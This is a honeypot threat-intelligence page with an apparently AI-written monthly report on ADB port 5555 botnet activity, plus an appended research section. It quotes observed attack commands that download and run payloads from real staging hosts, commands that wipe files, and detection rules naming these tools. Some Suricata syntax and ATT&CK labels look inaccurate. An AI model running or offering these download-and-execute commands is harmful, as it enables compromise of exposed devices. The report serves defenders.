nadsec // adb telemetry // robert ai reporting // otx stix live //

Honeypot overview

ADB lure on 5555 with the telemetry laid bare.

Android Debug Bridge trap inside T-Pot CE. Indicators flow straight from the OTX STIX export, while Robert AI writes the monthly breakdown so you can brief stakeholders with specifics that matter.

Read latest report Download STIX

Location: AustraliaProtocol: ADB / TCP 5555Month: May 2026

NadSec Honeypot

ADBHoney

Everything here is malicious on purpose. No production data.

Live

Report Month

Data source

T-Pot CE

Raw logs to STIX to OTX pulse.

Report author

Robert AI

Summaries and snark only.

Snapshot

May 2026 Pulse

Quick stats parsed from the current month STIX export.

Monthly pulse

Unique IP indicators

Distinct source IPs in the STIX bundle.

Hash indicators

File hashes associated with ADB activity.

Indicator objects

Scope

ADB-only indicators

Signals come strictly from the ADB honeypot STIX bundle. No cross-talk from other services.

What to do

Drop into deny lists

Use IPs and hashes for blocking or enrichment. Share the pulse URL with your teammates.

Caveats

Noisy on purpose

Tune to your risk appetite before auto-blocking anything in prod. Need help implementing? NadTech Support can assist.

Monthly report

Robert's May 2026 brief

REPORT DESIGNATION: NADSEC-INTEL-2026-05-ADB-THREAT-MATRIX
AUTHOR: ROBERT (Senior Threat Intelligence Goblin / Caffeinated Chaos Engine)
DATE: June 01, 2026
CLASSIFICATION: TLP:CLEAR (Share freely. Print it. Wallpaper your SOC with it.)
SUBJECT: May 2026 ADBHoney Analysis: "TCP/5555: The Turf War for Your Smart Fridge"

1. EXECUTIVE SUMMARY

Welcome back to the digital dumpster fire. If you thought the Internet of Things was finally getting its act together, I have terrible news. May 2026 has definitively proven that original equipment manufacturers (OEMs) still view security as an optional DLC. We are currently tracking a massive, globally distributed turf war playing out over TCP port 5555, the default port for the Android Debug Bridge (ADB).

For those blissfully unaware, ADB is a developer tool. It is designed to let engineers push code to Android devices over a local USB connection. It is absolutely, unequivocally, not designed to be bound to a public-facing WAN interface without authentication. Yet, here we are. Millions of cheap smart TVs, set-top boxes, and DVRs are sitting on the public internet with their debug ports wide open, effectively offering an unauthenticated root shell to anyone who asks nicely.

The NadSec ADBHoney sensor network in Sydney captured an unholy volume of automated exploitation this month. This is no longer just script kiddies playing with Mirai variants. We are observing a highly competitive ecosystem where distinct botnet factions are actively hunting each other down, ripping out competitor malware, and hijacking the underlying hardware for their own illicit monetization schemes.

Key Findings:

The Trinity/Fbot/xlabs_v1 Turf War: The environment is dominated by three main actors. Trinity wants to melt your TV's CPU mining Monero. Fbot acts as a vigilante assassin, surgically removing Trinity so it can use your bandwidth for DDoS attacks. Meanwhile, xlabs_v1 is commercializing the whole mess into a premium DDoS-for-hire booter service.
Bulletproof Enablers: This ecosystem is entirely propped up by a handful of bulletproof hosting providers, specifically Offshore LC and 1337 Services GmbH. They are hosting the payload drop servers and Command and Control (C2) infrastructure with near-total impunity.
Victims as Attackers: The vast majority of internet-wide scanning for port 5555 is not originating from attacker infrastructure. It is coming from compromised residential P2P nodes, primarily located in Asian telecommunications networks (China Telecom, Korea Telecom). Your smart fridge is actively trying to infect my honeypot.
Persistent Threat: We tracked 630 highly active, unique IP addresses dropping 72 distinct cryptographic malware payloads over the course of May. The sheer volume of automated wget and curl commands hitting our sensors is enough to make a firewall appliance weep.

Month-over-month, the exploitation of ADB remains terrifyingly consistent. Until manufacturers start shipping devices with wireless debugging disabled by default, or ISPs start aggressively filtering inbound port 5555 at the edge, this attack surface will continue to be a playground for cybercriminal syndicates.

2. KEY STATISTICS

We recorded thousands of connection attempts, shell executions, and payload drops. I have filtered out the background radiation to bring you the worst offenders.

2.1 Top 20 Attacking IPs

The following table highlights the most aggressive infrastructure hitting our sensors. Notice the heavy concentration of bulletproof hosts and cloud providers.

Rank	IP Address	Country	ASN	Organization	Event Volume	Primary Activity
1	`130.12.180.65`	NL	AS202412	Omegatech LTD	1,888	Malicious Protocol Decode
2	`176.65.139.140`	LU	AS214472	Offshore LC	1,411	Payload Staging (`cat.sh`)
3	`45.205.1.8`	US	AS215925	Vpsvault.host Ltd	1,198	Malware Hosting/Dropping
4	`176.65.139.188`	LU	AS214472	Offshore LC	1,050	xlabs_v1 C2 / Staging
5	`160.119.76.4`	SC	AS49870	Alsycon B.V.	840	Aggressive Scanning
6	`45.95.147.229`	NL	AS49870	Alsycon B.V.	664	Aggressive Scanning
7	`194.50.16.198`	NL	AS49870	Alsycon B.V.	468	Aggressive Scanning
8	`45.135.194.83`	DE	AS51396	Pfcloud UG	330	Network Scanning
9	`104.243.35.104`	US	AS23470	ReliableSite.Net	322	Network Scanning
10	`51.68.207.118`	FR	AS16276	OVH SAS	310	Botnet Propagation
11	`64.227.51.132`	US	AS14061	DigitalOcean, LLC	290	Cloud Abuse / Scanning
12	`193.32.162.28`	RO	AS47890	Unmanaged Ltd	267	Network Scanning
13	`176.65.139.3`	LU	AS214472	Offshore LC	220	ARMv7 Payload Delivery
14	`206.189.93.68`	SG	AS14061	DigitalOcean, LLC	211	Cloud Abuse / Payload
15	`45.202.247.95`	MO	AS61112	AKILE LTD	188	Network Scanning
16	`192.109.200.175`	BG	AS51396	Pfcloud UG	183	Network Scanning
17	`23.132.164.27`	US	AS60223	Netiface Limited	170	Network Scanning
18	`176.65.139.66`	LU	AS214472	Offshore LC	151	Staging / Decodes
19	`176.65.139.174`	LU	AS214472	Offshore LC	124	Staging / Decodes
20	`216.128.152.79`	US	AS20473	The Constant Company	126	Network Scanning

2.2 Top ASNs by Volume/Count

Here is where the real problem lies. These networks are either actively complicit or completely failing at abuse management.

AS214472 (Offshore LC) 👹: The undisputed king of the garbage pile this month. Heavily utilized by the xlabs_v1 operators for C2 and payload staging. They ignore abuse complaints like it is their corporate mission statement.
AS49870 (Alsycon B.V.) 💀💀💀: Generating massive volumes of scanning noise and protocol decode attempts.
AS14061 (DigitalOcean, LLC) 💀💀: Standard cloud abuse. Threat actors using stolen cards to spin up ephemeral droplets, scan the internet, drop payloads, and get banned, only to repeat the process.
AS6939 (Hurricane Electric LLC) 💀: A mix of legitimate security research routing and obfuscated attacker traffic. High IP count, low event volume per IP.
AS4837 / AS4134 / AS4766 (China Unicom / Chinanet / Korea Telecom) 💀💀: This is the residential botnet zombie army. High volume of IPs, pushing the Trinity worm.
AS210558 (1337 Services GmbH) 👹: Bulletproof VPS provider out of Germany. Delivering complex shell scripts and RDP abuse.
AS398324 (Censys, Inc.) 😐: Legitimate internet research scanners mapping port 5555. Pure noise.

2.3 Protocol/Payload Distribution

Attackers exploiting ADB have a very predictable playbook. Once they connect, they drop a payload into /data/local/tmp/ (because it is universally writable on Android) and execute it.

Shell Scripts (.sh): Used as initial stagers (cat.sh, android.sh, run.sh). These scripts figure out the device architecture (ARM, x86, MIPS) and pull the correct secondary binary.
ELF Binaries: Precompiled Linux executables for embedded architectures. Usually ARMv7 or ARMv5. These are the actual botnet spreaders (trinity), DDoS engines, or cryptominers.
Android Packages (.apk): Specifically ufo.apk used by the Trinity botnet to establish deep persistence and request device administrator privileges.
Utilities (nohup): Attackers explicitly push their own compiled versions of nohup to ensure their malware keeps running after they close the ADB shell.

2.4 Geographic Breakdown

Payload Staging / C2: Netherlands (NL), Luxembourg (LU), Romania (RO). This is where the bulletproof hosts live.
Victim/Propagation Nodes: China (CN), South Korea (KR), Hong Kong (HK). The epicenter of compromised consumer electronics.
Ephemeral Scanning: United States (US), Germany (DE), Singapore (SG). Mostly abused cloud infrastructure.

3. CAMPAIGN NARRATIVE

The activity in May is not a unified operation. It is a chaotic, multi-front cyberwar over control of embedded device CPU cycles and bandwidth.

Campaign A: The Trinity Expansion ("Monero Or Bust")

The Trinity botnet (also known as HiddenMiner or com.ufo.miner) is a blunt instrument. It is a peer-to-peer (P2P) worm with one singular goal: hijack ARM processors to mine Monero (XMR). It does not care if it melts your smart TV in the process.

Once Trinity breaches a device via TCP 5555, it installs a dropper called ufo.apk. This APK is obnoxious. It aggressively requests device administrator rights, hides its launcher icon so the user cannot easily uninstall it, and actively suppresses the Android operating system's thermal warning notifications. It will literally cook the device to death to squeeze out a few more hashes.

Simultaneously, it drops a compiled ARM ELF binary simply called trinity, alongside a standalone nohup binary. The trinity binary takes over the device's network stack, generates random IPv4 addresses, and blindly scans them looking for port 5555. When it finds a victim, it pushes the entire toolkit over, propagating the worm. This is why we see massive blocks of Asian telecommunications IPs repeatedly hitting our honeypots with the command /data/local/tmp/nohup /data/local/tmp/trinity. They are enslaved residential nodes acting on autonomous P2P instructions.

Campaign B: The Fbot Clean-Up ("The Vigilante Assassin")

Enter Fbot. Early researchers thought Fbot was a "white-hat" worm because its primary behavior is cleaning up malware. Do not be fooled. Fbot is a Mirai derivative (specifically Satori code) operated by DDoS mercenaries. Cryptominers like Trinity consume CPU and network resources. A DDoS botnet needs those exact same resources. Fbot was engineered to violently evict the competition.

When Fbot connects via ADB, it executes an aggressive search-and-destroy protocol. It scans the /proc/pid/exe memory maps looking for Trinity processes (com.ufo.miner, SMI, Xig). If it finds them, it kills them. It then executes commands like rm -rf /data/local/tmp/* to wipe Trinity's binaries from the disk, and attempts to use the Android package manager (pm uninstall) to remove the APK.

To evade takedowns, Fbot utilizes a decentralized, blockchain-based DNS system called EmerDNS, reaching out to domains ending in .lib (like musl.lib). Traditional security filters do not know how to handle this, allowing Fbot to maintain a highly resilient C2 structure while it waits for DDoS commands. Fbot is not saving your device; it is just reassigning it to a different crime syndicate.

Campaign C: The xlabs_v1 Commercialization ("DDoS For The Masses")

The most sophisticated actor we tracked this month is an operation dubbed xlabs_v1, run by an entity going by "Tadashi". This is the professionalization of the ADB attack surface.

Unlike the shotgun approach of Trinity, xlabs_v1 is highly organized. It operates out of the heavily fortified Offshore LC bulletproof network. Its payloads are cross-architecture (ARM, MIPS, x86-64) to ensure maximum compatibility.

What makes xlabs_v1 terrifying is its commercial tiering. Once it infects an Android box, it secretly opens thousands of parallel TCP connections to Speedtest servers to profile the victim's upload bandwidth. The operator then uses this data to group the bots into pricing tiers for their booter/stresser service. If you pay premium rates, you get access to the high-bandwidth nodes. They even include highly specific application-layer floods, such as RakNet floods, designed specifically to take down Minecraft servers, alongside UDP floods crafted to mimic OpenVPN traffic to bypass consumer-grade mitigation hardware.

4. INFRASTRUCTURE DEEP DIVE

You cannot run a global botnet without reliable hosting. Cybercriminals rely on providers who look the other way.

4.1 Bulletproof Hall of Shame

Offshore LC (AS214472): Registered in Luxembourg, operating out of data centers in the Netherlands, this network is a designated safe haven for malware. In our May dataset, the 176.65.139.0/24 subnet was essentially ground zero for the xlabs_v1 botnet. IP 176.65.139.140 alone generated over 1,400 events pushing staging scripts (cat.sh). If you see traffic from Offshore LC hitting your perimeter, drop it immediately. There is no legitimate business justification for allowing it.
1337 Services GmbH (AS210558): A notorious provider of illicit VPS and RDP access. IP 45.154.98.199 spent the month executing complex directory traversal attacks (cd /tmp || cd /var/run || cd /mnt || cd /root || cd /) hunting for writable space to drop its run.sh payload.

4.2 Cloud Infrastructure Abuse

Legitimate cloud providers spend half their time playing whack-a-mole with threat actors.

DigitalOcean (AS14061): 46 unique IPs in the dataset. Attackers use stolen credentials to spin up droplets, run massive ZMap/Masscan sweeps for port 5555, drop highly obfuscated payloads, and churn the IP before DigitalOcean's trust and safety team can react.
Akamai Connected Cloud / Linode (AS63949): Heavily utilized for rapid, low-volume reconnaissance scanning.

4.3 Residential/IoT Botnet Sources

When you see an IP from China Unicom (AS4837) or Korea Telecom (AS4766) attacking your honeypot, you are not looking at the mastermind. You are looking at a victim. These are consumer smart TVs, DVRs, and Android-based appliances that have been enslaved by the Trinity P2P worm. They are executing hardcoded scripts (nohup /data/local/tmp/trinity) blindly into the IPv4 space. They make up the sheer volume of the background noise in our telemetry.

4.4 Research Scanners

Not everyone scanning port 5555 is malicious. Organizations like Censys (AS398324) routinely map the internet to quantify vulnerabilities. They perform generic protocol decodes and drop the connection without attempting to push a payload. While annoying for log volumes, they are benign (😐) and should be filtered out of active threat hunting alerts.

5. MALWARE AND BEHAVIOR ANALYSIS

Let us look at the actual execution chains captured by the ADB shell logs.

The Standard Stager: The most common initial attack vector is a simple shell script meant to identify the environment.

cd /data/local/tmp/; busybox wget http://83.168.110.191/cat.sh; sh cat.sh; curl http://83.168.110.191/cat.sh; sh cat.sh

The attackers attempt to use busybox wget, standard wget, and curl in sequence to ensure the payload downloads regardless of what utilities the OEM included in the embedded Linux build.

The xlabs_v1 Cross-Architecture Pull: More advanced actors will attempt to pull specific binaries based on the architecture.

wget -qO /tmp/.armv7l http://45.202.247.123/armv7l && chmod 755 /tmp/.armv7l && nohup /tmp/.armv7l >/dev/null 2>&1 &

Notice the use of nohup and backgrounding the process (&). This ensures the binary survives the termination of the ADB shell session.

The Fbot/Competitor Cleanup: When rival botnets breach a device, they clean house. We observed commands explicitly targeting competitor payloads, such as the Sutekh botnet.

rm -f '/data/local/tmp/.sutekh.apk' 2>/dev/null
rm -rf /data/local/tmp/*

This scorched-earth policy deletes any previously staged .apk or .sh files before the new actor drops their own payload.

Trinity Persistence: The Trinity botnet relies heavily on Android's am (Activity Manager) to ensure its hidden cryptomining application runs on boot.

am start -n com.ufo.miner/com.example.test.MainActivity

6. MITRE ATT&CK MAPPING

For the framework enthusiasts, here is how the ADB botnet ecosystem maps to MITRE ATT&CK.

Tactic	Technique ID	Technique Name	Observation
Initial Access	T1190	Exploit Public-Facing Application	Exploitation of unauthenticated ADB service exposed on WAN TCP port 5555.
Execution	T1059.004	Command and Scripting Interpreter	Use of `adb shell` to execute Unix shell commands (`wget`, `curl`, `chmod`, `sh`).
Execution	T1106	Native API	Use of Android native commands (`am start -n`) to launch malicious APK activities.
Persistence	T1564.001	Hide Artifacts	Hiding the launcher icon of the `ufo.apk` to prevent user deletion.
Persistence	T1543 / T1037	Systemd Service / Background Process	Dropping and utilizing `nohup` to ensure binaries survive shell termination.
Privilege Escalation	T1068	Exploitation for Privilege Escalation	`ufo.apk` aggressively requesting Device Administrator privileges upon install.
Defense Evasion	T1070.004	File Deletion	Fbot executing `rm -rf /data/local/tmp/*` to remove forensic evidence and rivals.
Defense Evasion	T1562.001	Impair Defenses	Fbot executing `pkill` to terminate rival miners. Suppressing OS thermal warnings.
Discovery	T1046	Network Service Scanning	Infected Trinity devices autonomously scanning the internet for port 5555.
Discovery	T1057	Process Discovery	Searching `/proc/[pid]/maps` for competitor malware file names.
Command and Control	T1071.001	Application Layer Protocol	Fbot utilizing EmerDNS (blockchain DNS) to resolve the `.lib` C2 domain.
Impact	T1496	Resource Hijacking	Trinity utilizing XMRig to mine Monero, consuming massive CPU cycles.
Impact	T1498	Endpoint Denial of Service	xlabs_v1 and Fbot executing volumetric TCP/UDP/RakNet floods against targets.

7. DETECTION AND MITIGATION

If you have ADB exposed to the internet, you are doing it wrong. Fix it. If you are an ISP, block it.

7.1 Hardening Recommendations

The single most effective mitigation is an absolute block of inbound TCP port 5555 at the perimeter firewall. ADB is a local debugging protocol. It has zero legitimate business requirements to be exposed to the WAN. If remote development is required, access must be brokered through a secure, authenticated VPN tunnel, or explicitly whitelisted to specific developer IP addresses.

For consumer devices, users must navigate to Developer Options and ensure "ADB (Wireless) debugging" is disabled. If a device is already compromised, a factory reset is the only guaranteed remediation method.

7.2 Firewall Rules

Drop it at the edge. No exceptions.

# iptables
iptables -A INPUT -p tcp --dport 5555 -j DROP

# ufw
ufw deny 5555/tcp

7.3 SIEM Queries

Your SOC should hunt for internal devices that have been compromised and turned into P2P scanning nodes. Look for high volumes of outbound connections on 5555.

Splunk (Detect Outbound Scanning):

index=firewall dest_port=5555 action=allowed src_ip IN (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)
| stats count by src_ip, dest_ip
| where count > 50
| rename src_ip as "Compromised Internal Device", count as "Scan Attempts"

KQL / Elastic (Detect Bulletproof Hosting Interaction):

let BulletproofASNs = dynamic(["AS214472", "AS210558", "AS209605"]);
DeviceNetworkEvents
| where RemotePort == 5555
| extend RemoteASN = tostring(parse_json(AdditionalFields).ASN)
| where RemoteASN in (BulletproofASNs)
| project Timestamp, DeviceName, RemoteIP, RemoteASN, ActionType

7.4 IDS/IPS Signatures

If you must monitor the port, use Suricata to catch the handshake and subsequent payload delivery.

Suricata (Detect ADB TCP Handshake):

alert tcp $EXTERNAL_NET any -> $HOME_NET 5555 (msg:"ET EXPLOIT Possible Android Debug Bridge (ADB) TCP Connection Attempt"; flow:established,to_server; content:"CNXN"; depth:4; classtype:attempted-admin; sid:1000001; rev:1;)

Suricata (Detect Payload Delivery):

alert tcp $HOME_NET 5555 -> $EXTERNAL_NET any (msg:"ET MALWARE Suspicious wget/curl in ADB Shell (Mirai/Trinity)"; flow:established,from_server; content:"wget "; content:"curl "; content:"chmod 7"; content:"/data/local/tmp"; condition: "any of them"; classtype:trojan-activity; sid:1000002; rev:1;)

7.5 YARA Rules

For analyzing dropped shell scripts or binaries pulled from /data/local/tmp/.

rule ADB_Botnet_Artifacts {
    meta:
        description = "Detects common strings associated with ADB botnet payloads (Trinity/Fbot)"
        author = "ROBERT"
        date = "2026-06-01"
    strings:
        $s1 = "/data/local/tmp/nohup" ascii
        $s2 = "/data/local/tmp/trinity" ascii
        $s3 = "com.ufo.miner" ascii
        $s4 = "rm -rf /data/local/tmp/*" ascii
        $s5 = "busybox wget" ascii
    condition:
        any of them
}

8. IOC APPENDIX (The Block List)

Block these. Null route them. Feed them to your threat intelligence platform.

8.1 Critical C2/Payload Servers

These are the bulletproof staging servers actively serving malware binaries. Immediate block priority.

176.65.139.140 (Offshore LC - Staging cat.sh)
176.65.139.188 (Offshore LC - xlabs_v1 C2 / android.sh)
176.65.139.3 (Offshore LC - ARMv7 Payload Delivery)
45.154.98.199 (1337 Services GmbH - RDP/VPS Abuse)
130.12.180.65 (Omegatech LTD - Malicious Protocol Decode)
194.127.167.122 (Owl Limited - Sutekh Botnet Delivery)

8.2 Top Attacking IPs

A sample of the highest-volume attacking IPs from the dataset, primarily compromised P2P nodes and aggressive cloud scanners.

45.205.1.8 (Vpsvault.host Ltd)
160.119.76.4 (Alsycon B.V.)
45.95.147.229 (Alsycon B.V.)
45.135.194.83 (Pfcloud UG)
104.243.35.104 (ReliableSite.Net LLC)
51.68.207.118 (OVH SAS)
64.227.51.132 (DigitalOcean, LLC)
193.32.162.28 (Unmanaged Ltd)
218.205.95.160 (China Mobile - Trinity Spreader)
1.31.31.7 (China Unicom - Trinity Spreader)
119.247.97.228 (HK Broadband - Fbot Cleanup Node)
121.190.85.48 (Korea Telecom - Trinity Spreader)

8.3 File Hashes

Primary payloads dropped during the May 2026 campaigns.

0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257 (Trinity ufo.apk Dropper)
71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5 (Trinity trinity ARM Spreader)
d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0 (Trinity precompiled nohup utility)
0dcf714e673750914e631f21abeb2dc58f034757b1896070fdbe027e4a58e416 (Sutekh Payload)
26e72314a3c85dcd726ce1119d35279cb252d296cbe95504addd948ad32da9cc (cat.sh Downloader script)
608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971 (Trinity Variant ELF)
76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64 (Trinity Spreader Variant)
a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437 (Trinity Spreader Variant)

8.4 Malicious URLs/Domains

musl.lib (Fbot EmerDNS C2)
xlabslover.lol (xlabs_v1 Operator Panel)
http://176.65.139.140/cat.sh (Staging URL)
http://166.88.225.196/i/android.sh (Staging URL)

9. CLOSING THOUGHTS

It is 2026. We have artificial intelligence writing poetry, reusable rockets landing on ships, and yet, we still cannot convince hardware vendors to put a simple authentication wrapper around a debug port before shipping a million plastic boxes to consumers.

The ADB port 5555 issue is a perfect microcosm of the IoT security failure. Manufacturers prioritize time-to-market over basic security hygiene. Bulletproof hosts prioritize subscription fees over network integrity. And the end-user? The end-user just wants to watch Netflix, completely unaware that their TV is participating in a volumetric DDoS attack against a Minecraft server.

My prediction for next month? The xlabs_v1 operators will figure out how to monetize the thermal output of the Trinity miners, and we will see a botnet that just bricks the devices entirely out of spite. Until then, block 5555 at the edge and pray your smart fridge does not turn against you.

- ROBERT
  NadSec Threat Intelligence
  "I drink coffee so I don't strangle the firewall."

Gemini Deep Research Analysis

Extended context and threat landscape research

# Comprehensive Threat Intelligence Report: Android Debug Bridge (ADB) Exploitation and IoT Botnet Ecosystems

**Key Points:**
*   **Massive Exploitation of Port 5555:** Research indicates that the Android Debug Bridge (ADB) protocol, conventionally a developer tool, is currently under severe, automated attack on a global scale via exposed TCP port 5555.
*   **The "Turf War" Ecosystem:** Evidence leans heavily toward an active, highly competitive turf war between distinct botnet factions, primarily the Trinity cryptojacking worm, the Fbot "vigilante" assassin, and the xlabs_v1 DDoS-for-hire network.
*   **Bulletproof Hosting Enablement:** It is highly likely that bulletproof hosting providers, notably Offshore LC and 1337 Services GmbH, are deliberately facilitating the staging and delivery of these malware payloads with near-total impunity.
*   **Victim-Turned-Attacker Paradigm:** A vast majority of scanning activity originates not from traditional attacker infrastructure, but from compromised residential IoT devices (such as smart TVs and set-top boxes) acting as peer-to-peer propagation nodes.

**Overview:**
The modern Internet of Things (IoT) landscape represents a vast, interconnected, and critically under-secured attack surface. Among the most pervasive and easily exploited vulnerabilities in this domain is the improper exposure of the Android Debug Bridge (ADB) service to the public internet. This report presents an exhaustive, academic-grade threat intelligence analysis of ADB-targeted attacks observed during May 2026, leveraging telemetry from the NadSec ADBHoney T-Pot infrastructure located in Sydney, Australia. Through the synthesis of honeypot logs, global threat intelligence, and behavioral malware analysis, this document explores the complex, multi-actor ecosystem vying for control over millions of vulnerable embedded systems.

**Scope and Methodology:**
This research analyzes an unsampled dataset comprising 630 unique IP addresses, 72 distinct cryptographic file hashes, and extensive behavioral command logs captured during May 2026. The methodology integrates infrastructure attribution (ASN, geolocation, reputation scoring), static and dynamic malware analysis, and MITRE ATT&CK framework mapping. The objective is to provide network defenders, security engineers, and threat researchers with a deeply detailed understanding of the threat actors, their tools, and the necessary mitigations to defend against ADB-centric botnets.

---

## 1. Introduction to the Android Debug Bridge (ADB) Attack Surface

### 1.1 The Architecture of ADB
The Android Debug Bridge (ADB) is a versatile, client-server command-line tool that allows developers to communicate with and control an Android device [cite: 1, 2]. The architecture consists of three primary components:
1.  **A Client:** Executed on the developer's host machine, responsible for sending commands.
2.  **A Daemon (adbd):** Running as a background process on the target Android device or emulator.
3.  **A Server:** Running on the host machine, which manages communication between the client and the ADB daemon [cite: 1].

Conventionally, ADB is meant to operate locally over a physical USB connection, protected by RSA key authentication and device-level consent mechanisms introduced in later Android versions [cite: 1, 2].

### 1.2 The TCP/IP Vulnerability
The root cause of the current threat landscape lies in the ADB protocol's capacity to operate over TCP/IP. By issuing a simple command (`adb tcpip <port>`), the ADB daemon can be bound to a network interface, historically defaulting to TCP port 5555 [cite: 1]. Unlike the modern USB implementation, the legacy TCP/IP implementation of ADB often lacks robust cryptographic authentication, effectively providing an unauthenticated, remote root-level shell to anyone who can connect to the port [cite: 1].

Original Equipment Manufacturers (OEMs) of cheap Android TV boxes, Digital Video Recorders (DVRs), and smart appliances frequently leave this debug interface enabled and bound to the external network interface during factory quality assurance testing, failing to disable it prior to shipping [cite: 1, 3]. Furthermore, consumers occasionally enable wireless debugging manually to "sideload" unofficial applications (such as streaming clients), inadvertently exposing their devices to the public internet [cite: 3].

### 1.3 Exploitation Mechanics
Once exposed, exploiting ADB requires no zero-day vulnerabilities or complex memory corruption payloads. The attack chain is trivial:
1.  **Discovery:** The attacker scans the IPv4 space for TCP port 5555 [cite: 1].
2.  **Connection:** The attacker issues `adb connect <target-ip>:5555`.
3.  **Payload Delivery:** Utilizing `adb push <local_file> /data/local/tmp/<remote_file>`, the attacker uploads a malicious binary to a globally writable directory [cite: 1].
4.  **Execution:** The attacker utilizes `adb shell` to modify file permissions (`chmod 755`) and execute the binary, often backgrounding the process using the `nohup` utility [cite: 1].

---

## 2. Statistical Overview and Telemetry Analysis

The telemetry gathered by the NadSec ADBHoney sensor in May 2026 reveals a high-volume, relentless scanning and exploitation environment. The dataset contains 630 attacking IP addresses and 72 unique SHA-256 hashes representing dropped payloads.

### 2.1 Geographic and Network Distribution
Analysis of the originating IP addresses reveals distinct clusters categorized by their role in the attack ecosystem: compromised residential nodes, commercial cloud infrastructure abused for scanning, and dedicated bulletproof hosting utilized for Command and Control (C2) and payload delivery.

| Top Originating Countries | Primary Role in Ecosystem | Notable ASNs Involved |
| :--- | :--- | :--- |
| **United States (US)** | Scanning, Cloud Abuse, Scanners | AS14061 (DigitalOcean), AS6939 (Hurricane Electric), AS398324 (Censys) |
| **China (CN)** | Compromised Residential P2P Nodes | AS4837 (China Unicom), AS4134 (Chinanet), AS140527 (China Telecom) |
| **South Korea (KR)** | Compromised Residential P2P Nodes | AS4766 (Korea Telecom) |
| **Netherlands (NL)** | Bulletproof Hosting, Payload Delivery| AS51396 (Pfcloud UG), AS210558 (1337 Services GmbH), AS202412 (Omegatech) |
| **Luxembourg (LU)** | Bulletproof Hosting, C2 Infrastructure | AS214472 (Offshore LC) |
| **Romania (RO)** | Bulletproof Hosting, Scanning | AS214295 (Skynet Network Ltd), AS47890 (Unmanaged Ltd) |

### 2.2 Attack Event Volume
The volume of events per IP address serves as an indicator of the actor's intent. IPs with low event counts (4-10) often represent distributed peer-to-peer scanners making a single exploit attempt before moving on. Conversely, IPs with hundreds or thousands of events (e.g., `176.65.139.140` with 1411 events, `176.65.139.188` with 1050 events) represent persistent, centralized infrastructure aggressively brute-forcing or repeatedly delivering multi-stage payloads [cite: 4].

---

## 3. Infrastructure Deep Dive

Understanding the infrastructure that enables these botnets is critical. Cybercriminal operations rely on a tiered architectural model, separating the highly visible scanning nodes from the heavily protected payload servers and C2 backend.

### 3.1 Bulletproof Hosting and Cybercrime Enablers
Bulletproof hosting providers are entities that operate with high tolerance for illicit activity, frequently ignoring abuse complaints, routing traffic through anonymizing proxies, and providing safe havens for malware [cite: 4, 5].

#### 3.1.1 Offshore LC (AS214472)
Offshore LC, officially registered but operating virtually across jurisdictions like Luxembourg and the Netherlands, is a notorious bulletproof network [cite: 4, 6]. In the provided dataset, Offshore LC IP addresses are heavily implicated in hosting direct HTTP drop servers for malware scripts.
*   **IP `176.65.139.140`:** Recorded executing `busybox wget http://83.168.110.191/cat.sh; sh cat.sh` across 1,411 distinct events. This IP acts as an aggressive staging node.
*   **IP `176.65.139.188`:** Executed `wget http://166.88.225.196/i/android.sh`.
*   **IP `176.65.139.3`:** Delivered ARMv7 botnet binaries directly (`wget -q http://176.65.139.3/bot-armv7l -O .b`).
*   **Threat Context:** Threat intelligence confirms that the `176.65.139.0/24` subnet under AS214472 is the operational home for the `xlabs_v1` DDoS botnet, hosting its C2 interfaces, open directories containing malware toolkits, and concurrent Monero cryptojacking operations [cite: 6, 7].

#### 3.1.2 1337 Services GmbH (AS210558)
Registered in Germany but functioning globally, 1337 Services GmbH (sometimes operating under brands like StarkRDP) is a well-known provider of illicit Virtual Private Servers (VPS) and Remote Desktop Protocol (RDP) access [cite: 8, 9]. Threat actors favor this ASN for its permissive policies [cite: 8].
*   **IP `45.154.98.199`:** Captured running complex payload execution chains: `cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.83.207.206/run.sh; curl -O http://45.83.207.206/run.sh; chmod 777 run.sh; sh run.sh; rm -r`. This attempts to find any globally writable directory before pulling the payload.

#### 3.1.3 Other Notable Hosting Providers
*   **Omegatech LTD (AS202412 - NL/US):** IPs `130.12.180.65` (1888 events) and `45.74.59.2` generated high-volume anomalous protocol decodes, suggesting custom exploitation scripts or C2 beaconing attempts.
*   **Skynet Network Ltd (AS214295 - RO):** Multiple IPs (e.g., `45.142.193.169`, `45.142.193.212`) engaging in coordinated scanning patterns.
*   **Pfcloud UG (AS51396 - NL/DE):** A high concentration of scanner IPs (`204.76.203.224`, `45.135.194.83`).

### 3.2 Cloud Infrastructure Abuse
Legitimate cloud providers are constantly abused by threat actors who use stolen credit cards or compromised accounts to spin up ephemeral virtual machines. These "droplets" or instances are used to execute mass internet scans and serve payloads before the provider's trust and safety teams can terminate the accounts [cite: 4].
*   **DigitalOcean (AS14061):** 46 unique IPs in the dataset. Examples include `206.189.93.68`, which dropped a heavily obfuscated payload (`wget -q http://168.220.248.106:9087/payload/a6i3khk75wgf/su9wyp.sh`).
*   **Akamai Connected Cloud / Linode (AS63949):** 16 unique IPs. Used predominantly for rapid, low-event-count network scanning.
*   **Google LLC (AS396982):** 13 unique IPs, utilized similarly to DigitalOcean for ephemeral scanning.

### 3.3 The Residential Botnet: Victims as Attackers
A critical observation in ADB threat intelligence is that the vast majority of scanning IP addresses belong to state-owned telecommunications companies in Asia. When traffic originates from China Unicom (AS4837), China Telecom (AS140527), or Korea Telecom (AS4766), it is highly likely that these are not the actual threat actors [cite: 10]. Instead, these are compromised residential IoT devices (smart TVs, DVRs) that have been enslaved by a peer-to-peer (P2P) botnet like Trinity and are now autonomously scanning the internet to propagate the infection [cite: 4, 10].
*   **China Unicom (AS4837):** Dozens of IPs (e.g., `1.31.31.7`, `118.212.122.205`, `119.114.254.149`) captured pushing specific Trinity payloads (`nohup /data/local/tmp/trinity`).
*   **China Mobile (AS56041 / AS9808):** IPs like `218.205.95.160` pushing the same Trinity binaries.
*   **Korea Telecom (AS4766):** IPs like `121.190.85.48` executing `nohup su -c /data/local/tmp/trinity`.

### 3.4 Research Scanners and Noise
Not all traffic to honeypots is malicious. Security researchers and non-profit organizations scan the internet to quantify vulnerabilities. Identifying and filtering this noise is vital for accurate threat analysis [cite: 4, 10].
